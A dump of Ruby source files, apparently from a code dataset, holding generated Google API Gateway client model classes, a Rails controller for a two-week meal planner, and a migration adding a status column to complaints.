# owner" expression: "document.owner == request.auth.claims.email" Example (
# Logic): title: "Public documents" description: "Determine whether the document
# should be publicly visible" expression: "document.type != 'private' &&
# document.type != 'internal'" Example (Data Manipulation): title: "Notification
# string" description: "Create a notification string with a timestamp."
# expression: "'New message received at ' + string(document.create_time)" The
# exact variables and functions that may be referenced within an expression are
# determined by the service that evaluates it. See the service documentation for
# additional information.
class ApigatewayExpr
include Google::Apis::Core::Hashable
# Optional. Description of the expression. This is a longer text which describes
# the expression, e.g. when hovered over it in a UI.
# Corresponds to the JSON property `description`
# @return [String]
attr_accessor :description
# Textual representation of an expression in Common Expression Language syntax.
# Corresponds to the JSON property `expression`
# @return [String]
attr_accessor :expression
# Optional. String indicating the location of the expression for error reporting,
# e.g. a file name and a position in the file.
# Corresponds to the JSON property `location`
# @return [String]
attr_accessor :location
# Optional. Title for the expression, i.e. a short string describing its purpose.
# This can be used e.g. in UIs which allow to enter the expression.
# Corresponds to the JSON property `title`
# @return [String]
attr_accessor :title
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@description = args[:description] if args.key?(:description)
@expression = args[:expression] if args.key?(:expression)
@location = args[:location] if args.key?(:location)
@title = args[:title] if args.key?(:title)
end
end
# A Gateway is an API-aware HTTP proxy. It performs API-Method and/or API-
# Consumer specific actions based on an API Config such as authentication,
# policy enforcement, and backend selection.
class ApigatewayGateway
include Google::Apis::Core::Hashable
# Required. Resource name of the API Config for this Gateway. Format: projects/`
# project`/locations/global/apis/`api`/configs/`apiConfig`
# Corresponds to the JSON property `apiConfig`
# @return [String]
attr_accessor :api_config
# Output only. Created time.
# Corresponds to the JSON property `createTime`
# @return [String]
attr_accessor :create_time
# Output only. The default API Gateway host name of the form ``gateway_id`-`hash`
# .`region_code`.gateway.dev`.
# Corresponds to the JSON property `defaultHostname`
# @return [String]
attr_accessor :default_hostname
# Optional. Display name.
# Corresponds to the JSON property `displayName`
# @return [String]
attr_accessor :display_name
# Optional. Resource labels to represent user-provided metadata. Refer to cloud
# documentation on labels for more details. https://cloud.google.com/compute/
# docs/labeling-resources
# Corresponds to the JSON property `labels`
# @return [Hash<String,String>]
attr_accessor :labels
# Output only. Resource name of the Gateway. Format: projects/`project`/
# locations/`location`/gateways/`gateway`
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# Output only. The current state of the Gateway.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
# Output only. Updated time.
# Corresponds to the JSON property `updateTime`
# @return [String]
attr_accessor :update_time
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@api_config = args[:api_config] if args.key?(:api_config)
@create_time = args[:create_time] if args.key?(:create_time)
@default_hostname = args[:default_hostname] if args.key?(:default_hostname)
@display_name = args[:display_name] if args.key?(:display_name)
@labels = args[:labels] if args.key?(:labels)
@name = args[:name] if args.key?(:name)
@state = args[:state] if args.key?(:state)
@update_time = args[:update_time] if args.key?(:update_time)
end
end
# Response message for ApiGatewayService.ListApiConfigs
class ApigatewayListApiConfigsResponse
include Google::Apis::Core::Hashable
# API Configs.
# Corresponds to the JSON property `apiConfigs`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayApiConfig>]
attr_accessor :api_configs
# Next page token.
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
# Locations that could not be reached.
# Corresponds to the JSON property `unreachableLocations`
# @return [Array<String>]
attr_accessor :unreachable_locations
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@api_configs = args[:api_configs] if args.key?(:api_configs)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
@unreachable_locations = args[:unreachable_locations] if args.key?(:unreachable_locations)
end
end
# Response message for ApiGatewayService.ListApis
class ApigatewayListApisResponse
include Google::Apis::Core::Hashable
# APIs.
# Corresponds to the JSON property `apis`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayApi>]
attr_accessor :apis
# Next page token.
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
# Locations that could not be reached.
# Corresponds to the JSON property `unreachableLocations`
# @return [Array<String>]
attr_accessor :unreachable_locations
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@apis = args[:apis] if args.key?(:apis)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
@unreachable_locations = args[:unreachable_locations] if args.key?(:unreachable_locations)
end
end
# Response message for ApiGatewayService.ListGateways
class ApigatewayListGatewaysResponse
include Google::Apis::Core::Hashable
# Gateways.
# Corresponds to the JSON property `gateways`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayGateway>]
attr_accessor :gateways
# Next page token.
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
# Locations that could not be reached.
# Corresponds to the JSON property `unreachableLocations`
# @return [Array<String>]
attr_accessor :unreachable_locations
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@gateways = args[:gateways] if args.key?(:gateways)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
@unreachable_locations = args[:unreachable_locations] if args.key?(:unreachable_locations)
end
end
# The response message for Locations.ListLocations.
class ApigatewayListLocationsResponse
include Google::Apis::Core::Hashable
# A list of locations that matches the specified filter in the request.
# Corresponds to the JSON property `locations`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayLocation>]
attr_accessor :locations
# The standard List next-page token.
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@locations = args[:locations] if args.key?(:locations)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
end
end
# The response message for Operations.ListOperations.
class ApigatewayListOperationsResponse
include Google::Apis::Core::Hashable
# The standard List next-page token.
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
# A list of operations that matches the specified filter in the request.
# Corresponds to the JSON property `operations`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayOperation>]
attr_accessor :operations
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
@operations = args[:operations] if args.key?(:operations)
end
end
# A resource that represents Google Cloud Platform location.
class ApigatewayLocation
include Google::Apis::Core::Hashable
# The friendly name for this location, typically a nearby city name. For example,
# "Tokyo".
# Corresponds to the JSON property `displayName`
# @return [String]
attr_accessor :display_name
# Cross-service attributes for the location. For example `"cloud.googleapis.com/
# region": "us-east1"`
# Corresponds to the JSON property `labels`
# @return [Hash<String,String>]
attr_accessor :labels
# The canonical id for this location. For example: `"us-east1"`.
# Corresponds to the JSON property `locationId`
# @return [String]
attr_accessor :location_id
# Service-specific metadata. For example the available capacity at the given
# location.
# Corresponds to the JSON property `metadata`
# @return [Hash<String,Object>]
attr_accessor :metadata
# Resource name for the location, which may vary between implementations. For
# example: `"projects/example-project/locations/us-east1"`
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@display_name = args[:display_name] if args.key?(:display_name)
@labels = args[:labels] if args.key?(:labels)
@location_id = args[:location_id] if args.key?(:location_id)
@metadata = args[:metadata] if args.key?(:metadata)
@name = args[:name] if args.key?(:name)
end
end
# This resource represents a long-running operation that is the result of a
# network API call.
class ApigatewayOperation
include Google::Apis::Core::Hashable
# If the value is `false`, it means the operation is still in progress. If `true`
# , the operation is completed, and either `error` or `response` is available.
# Corresponds to the JSON property `done`
# @return [Boolean]
attr_accessor :done
alias_method :done?, :done
# The `Status` type defines a logical error model that is suitable for different
# programming environments, including REST APIs and RPC APIs. It is used by [
# gRPC](https://github.com/grpc). Each `Status` message contains three pieces of
# data: error code, error message, and error details. You can find out more
# about this error model and how to work with it in the [API Design Guide](https:
# //cloud.google.com/apis/design/errors).
# Corresponds to the JSON property `error`
# @return [Google::Apis::ApigatewayV1::ApigatewayStatus]
attr_accessor :error
# Service-specific metadata associated with the operation. It typically contains
# progress information and common metadata such as create time. Some services
# might not provide such metadata. Any method that returns a long-running
# operation should document the metadata type, if any.
# Corresponds to the JSON property `metadata`
# @return [Hash<String,Object>]
attr_accessor :metadata
# The server-assigned name, which is only unique within the same service that
# originally returns it. If you use the default HTTP mapping, the `name` should
# be a resource name ending with `operations/`unique_id``.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# The normal response of the operation in case of success. If the original
# method returns no data on success, such as `Delete`, the response is `google.
# protobuf.Empty`. If the original method is standard `Get`/`Create`/`Update`,
# the response should be the resource. For other methods, the response should
# have the type `XxxResponse`, where `Xxx` is the original method name. For
# example, if the original method name is `TakeSnapshot()`, the inferred
# response type is `TakeSnapshotResponse`.
# Corresponds to the JSON property `response`
# @return [Hash<String,Object>]
attr_accessor :response
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@done = args[:done] if args.key?(:done)
@error = args[:error] if args.key?(:error)
@metadata = args[:metadata] if args.key?(:metadata)
@name = args[:name] if args.key?(:name)
@response = args[:response] if args.key?(:response)
end
end
# Represents the metadata of the long-running operation.
class ApigatewayOperationMetadata
include Google::Apis::Core::Hashable
# Output only. API version used to start the operation.
# Corresponds to the JSON property `apiVersion`
# @return [String]
attr_accessor :api_version
# Output only. The time the operation was created.
# Corresponds to the JSON property `createTime`
# @return [String]
attr_accessor :create_time
# Output only. Diagnostics generated during processing of configuration source
# files.
# Corresponds to the JSON property `diagnostics`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayOperationMetadataDiagnostic>]
attr_accessor :diagnostics
# Output only. The time the operation finished running.
# Corresponds to the JSON property `endTime`
# @return [String]
attr_accessor :end_time
# Output only. Identifies whether the user has requested cancellation of the
# operation. Operations that have successfully been cancelled have Operation.
# error value with a google.rpc.Status.code of 1, corresponding to `Code.
# CANCELLED`.
# Corresponds to the JSON property `requestedCancellation`
# @return [Boolean]
attr_accessor :requested_cancellation
alias_method :requested_cancellation?, :requested_cancellation
# Output only. Human-readable status of the operation, if any.
# Corresponds to the JSON property `statusMessage`
# @return [String]
attr_accessor :status_message
# Output only. Server-defined resource path for the target of the operation.
# Corresponds to the JSON property `target`
# @return [String]
attr_accessor :target
# Output only. Name of the verb executed by the operation.
# Corresponds to the JSON property `verb`
# @return [String]
attr_accessor :verb
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@api_version = args[:api_version] if args.key?(:api_version)
@create_time = args[:create_time] if args.key?(:create_time)
@diagnostics = args[:diagnostics] if args.key?(:diagnostics)
@end_time = args[:end_time] if args.key?(:end_time)
@requested_cancellation = args[:requested_cancellation] if args.key?(:requested_cancellation)
@status_message = args[:status_message] if args.key?(:status_message)
@target = args[:target] if args.key?(:target)
@verb = args[:verb] if args.key?(:verb)
end
end
# Diagnostic information from configuration processing.
class ApigatewayOperationMetadataDiagnostic
include Google::Apis::Core::Hashable
# Location of the diagnostic.
# Corresponds to the JSON property `location`
# @return [String]
attr_accessor :location
# The diagnostic message.
# Corresponds to the JSON property `message`
# @return [String]
attr_accessor :message
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@location = args[:location] if args.key?(:location)
@message = args[:message] if args.key?(:message)
end
end
# An Identity and Access Management (IAM) policy, which specifies access
# controls for Google Cloud resources. A `Policy` is a collection of `bindings`.
# A `binding` binds one or more `members` to a single `role`. Members can be
# user accounts, service accounts, Google groups, and domains (such as G Suite).
# A `role` is a named list of permissions; each `role` can be an IAM predefined
# role or a user-created custom role. For some types of Google Cloud resources,
# a `binding` can also specify a `condition`, which is a logical expression that
# allows access to a resource only if the expression evaluates to `true`. A
# condition can add constraints based on attributes of the request, the resource,
# or both. To learn which resources support conditions in their IAM policies,
# see the [IAM documentation](https://cloud.google.com/iam/help/conditions/
# resource-policies). **JSON example:** ` "bindings": [ ` "role": "roles/
# resourcemanager.organizationAdmin", "members": [ "user:[email protected]", "
# group:[email protected]", "domain:google.com", "serviceAccount:my-project-id@
# appspot.gserviceaccount.com" ] `, ` "role": "roles/resourcemanager.
# organizationViewer", "members": [ "user:[email protected]" ], "condition": ` "
# title": "expirable access", "description": "Does not grant access after Sep
# 2020", "expression": "request.time < timestamp('2020-10-01T00:00:00.000Z')", `
# ` ], "etag": "BwWWja0YfJA=", "version": 3 ` **YAML example:** bindings: -
# members: - user:[email protected] - group:[email protected] - domain:google.
# com - serviceAccount:[email protected] role: roles/
# resourcemanager.organizationAdmin - members: - user:[email protected] role:
# roles/resourcemanager.organizationViewer condition: title: expirable access
# description: Does not grant access after Sep 2020 expression: request.time <
# timestamp('2020-10-01T00:00:00.000Z') etag: BwWWja0YfJA= version: 3 For a
# description of IAM and its features, see the [IAM documentation](https://cloud.
# google.com/iam/docs/).
class ApigatewayPolicy
include Google::Apis::Core::Hashable
# Specifies cloud audit logging configuration for this policy.
# Corresponds to the JSON property `auditConfigs`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayAuditConfig>]
attr_accessor :audit_configs
# Associates a list of `members` to a `role`. Optionally, may specify a `
# condition` that determines how and when the `bindings` are applied. Each of
# the `bindings` must contain at least one member.
# Corresponds to the JSON property `bindings`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayBinding>]
attr_accessor :bindings
# `etag` is used for optimistic concurrency control as a way to help prevent
# simultaneous updates of a policy from overwriting each other. It is strongly
# suggested that systems make use of the `etag` in the read-modify-write cycle
# to perform policy updates in order to avoid race conditions: An `etag` is
# returned in the response to `getIamPolicy`, and systems are expected to put
# that etag in the request to `setIamPolicy` to ensure that their change will be
# applied to the same version of the policy. **Important:** If you use IAM
# Conditions, you must include the `etag` field whenever you call `setIamPolicy`.
# If you omit this field, then IAM allows you to overwrite a version `3` policy
# with a version `1` policy, and all of the conditions in the version `3` policy
# are lost.
# Corresponds to the JSON property `etag`
# NOTE: Values are automatically base64 encoded/decoded in the client library.
# @return [String]
attr_accessor :etag
# Specifies the format of the policy. Valid values are `0`, `1`, and `3`.
# Requests that specify an invalid value are rejected. Any operation that
# affects conditional role bindings must specify version `3`. This requirement
# applies to the following operations: * Getting a policy that includes a
# conditional role binding * Adding a conditional role binding to a policy *
# Changing a conditional role binding in a policy * Removing any role binding,
# with or without a condition, from a policy that includes conditions **
# Important:** If you use IAM Conditions, you must include the `etag` field
# whenever you call `setIamPolicy`. If you omit this field, then IAM allows you
# to overwrite a version `3` policy with a version `1` policy, and all of the
# conditions in the version `3` policy are lost. If a policy does not include
# any conditions, operations on that policy may specify any valid version or
# leave the field unset. To learn which resources support conditions in their
# IAM policies, see the [IAM documentation](https://cloud.google.com/iam/help/
# conditions/resource-policies).
# Corresponds to the JSON property `version`
# @return [Fixnum]
attr_accessor :version
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@audit_configs = args[:audit_configs] if args.key?(:audit_configs)
@bindings = args[:bindings] if args.key?(:bindings)
@etag = args[:etag] if args.key?(:etag)
@version = args[:version] if args.key?(:version)
end
end
# Request message for `SetIamPolicy` method.
class ApigatewaySetIamPolicyRequest
include Google::Apis::Core::Hashable
# An Identity and Access Management (IAM) policy, which specifies access
# controls for Google Cloud resources. A `Policy` is a collection of `bindings`.
# A `binding` binds one or more `members` to a single `role`. Members can be
# user accounts, service accounts, Google groups, and domains (such as G Suite).
# A `role` is a named list of permissions; each `role` can be an IAM predefined
# role or a user-created custom role. For some types of Google Cloud resources,
# a `binding` can also specify a `condition`, which is a logical expression that
# allows access to a resource only if the expression evaluates to `true`. A
# condition can add constraints based on attributes of the request, the resource,
# or both. To learn which resources support conditions in their IAM policies,
# see the [IAM documentation](https://cloud.google.com/iam/help/conditions/
# resource-policies). **JSON example:** ` "bindings": [ ` "role": "roles/
# resourcemanager.organizationAdmin", "members": [ "user:[email protected]", "
# group:[email protected]", "domain:google.com", "serviceAccount:my-project-id@
# appspot.gserviceaccount.com" ] `, ` "role": "roles/resourcemanager.
# organizationViewer", "members": [ "user:[email protected]" ], "condition": ` "
# title": "expirable access", "description": "Does not grant access after Sep
# 2020", "expression": "request.time < timestamp('2020-10-01T00:00:00.000Z')", `
# ` ], "etag": "BwWWja0YfJA=", "version": 3 ` **YAML example:** bindings: -
# members: - user:[email protected] - group:[email protected] - domain:google.
# com - serviceAccount:[email protected] role: roles/
# resourcemanager.organizationAdmin - members: - user:[email protected] role:
# roles/resourcemanager.organizationViewer condition: title: expirable access
# description: Does not grant access after Sep 2020 expression: request.time <
# timestamp('2020-10-01T00:00:00.000Z') etag: BwWWja0YfJA= version: 3 For a
# description of IAM and its features, see the [IAM documentation](https://cloud.
# google.com/iam/docs/).
# Corresponds to the JSON property `policy`
# @return [Google::Apis::ApigatewayV1::ApigatewayPolicy]
attr_accessor :policy
# OPTIONAL: A FieldMask specifying which fields of the policy to modify. Only
# the fields in the mask will be modified. If no mask is provided, the following
# default mask is used: `paths: "bindings, etag"`
# Corresponds to the JSON property `updateMask`
# @return [String]
attr_accessor :update_mask
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@policy = args[:policy] if args.key?(:policy)
@update_mask = args[:update_mask] if args.key?(:update_mask)
end
end
# The `Status` type defines a logical error model that is suitable for different
# programming environments, including REST APIs and RPC APIs. It is used by [
# gRPC](https://github.com/grpc). Each `Status` message contains three pieces of
# data: error code, error message, and error details. You can find out more
# about this error model and how to work with it in the [API Design Guide](https:
# //cloud.google.com/apis/design/errors).
class ApigatewayStatus
include Google::Apis::Core::Hashable
# The status code, which should be an enum value of google.rpc.Code.
# Corresponds to the JSON property `code`
# @return [Fixnum]
attr_accessor :code
# A list of messages that carry the error details. There is a common set of
# message types for APIs to use.
# Corresponds to the JSON property `details`
# @return [Array<Hash<String,Object>>]
attr_accessor :details
# A developer-facing error message, which should be in English. Any user-facing
# error message should be localized and sent in the google.rpc.Status.details
# field, or localized by the client.
# Corresponds to the JSON property `message`
# @return [String]
attr_accessor :message
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@code = args[:code] if args.key?(:code)
@details = args[:details] if args.key?(:details)
@message = args[:message] if args.key?(:message)
end
end
# Request message for `TestIamPermissions` method.
class ApigatewayTestIamPermissionsRequest
include Google::Apis::Core::Hashable
# The set of permissions to check for the `resource`. Permissions with wildcards
# (such as '*' or 'storage.*') are not allowed. For more information see [IAM
# Overview](https://cloud.google.com/iam/docs/overview#permissions).
# Corresponds to the JSON property `permissions`
# @return [Array<String>]
attr_accessor :permissions
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@permissions = args[:permissions] if args.key?(:permissions)
end
end
# Response message for `TestIamPermissions` method.
class ApigatewayTestIamPermissionsResponse
include Google::Apis::Core::Hashable
# A subset of `TestPermissionsRequest.permissions` that the caller is allowed.
# Corresponds to the JSON property `permissions`
# @return [Array<String>]
attr_accessor :permissions
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@permissions = args[:permissions] if args.key?(:permissions)
end
end
# A generic empty message that you can re-use to avoid defining duplicated empty
# messages in your APIs. A typical example is to use it as the request or the
# response type of an API method. For instance: service Foo ` rpc Bar(google.
# protobuf.Empty) returns (google.protobuf.Empty); ` The JSON representation for
# `Empty` is empty JSON object ````.
class Empty
include Google::Apis::Core::Hashable
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
end
end
end
end
end
| 45.563115 | 106 | 0.639191 |
28d59222bab8646c53e69e55b728b48dbd83ad60 | 898 | class MealsController < ApplicationController
def create
meal = current_user.meals.create(meal_params)
redirect_to meals_path
end
def update
if Meal.find(params[:id]).update(meal_params)
redirect_to meals_path
else
end
end
def index
@planner = TwoWeekPlanner.new
@meals = Meal
.where("scheduled_at BETWEEN ? AND ?",
@planner.weeks.first.first.beginning_of_day,
@planner.weeks.last.last.end_of_day)
.order("scheduled_at desc")
@planner.add_meals(@meals)
respond_to do |format|
format.html
end
end
def destroy
if current_user.meals.find(params[:id]).destroy
redirect_to meals_path, notice: "Meal destroyed."
else
redirect_to meals_path, notice: "Meal could not be destroyed."
end
end
private
def meal_params
params.require(:meal).permit :recipe_id, :scheduled_at
end
end
| 20.883721 | 68 | 0.688196 |
339098674e1471052cd492b17fa7f19c7c62b00c | 127 | class AddStatusToComplaints < ActiveRecord::Migration[5.0]
def change
add_column :complaints, :status, :string
end
end
| 21.166667 | 58 | 0.755906 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.